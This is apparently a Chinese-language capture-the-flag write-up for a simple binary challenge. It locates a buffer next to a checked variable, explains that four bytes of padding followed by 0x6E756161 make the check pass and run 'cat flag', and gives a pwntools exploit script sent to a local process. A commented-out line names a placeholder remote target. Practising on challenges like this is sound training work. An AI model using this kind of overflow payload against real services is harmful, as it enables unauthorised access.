A、程序分析
1、缓冲区地址为601068h
2、判断条件 --> 60106Ch为起始地址 , 存储6E756161h
3、判断条件成立执行cat flag
B、利用分析
1、601068h - 60106Bh --> 4byte 填充数据
60106Ch - 60106Fh --> 4byte 判断条件 0x6E756161
C、exp
#!/usr/bin/python3
from pwn import *
#r = remote('exploitme.example.com', 31337)
r = process('./4f2f44c9471d4dc2b59768779e378282')
payload = p32(0x6E756161)*2
r.recvuntil('helloworld')
r.sendline(payload)
r.interactive()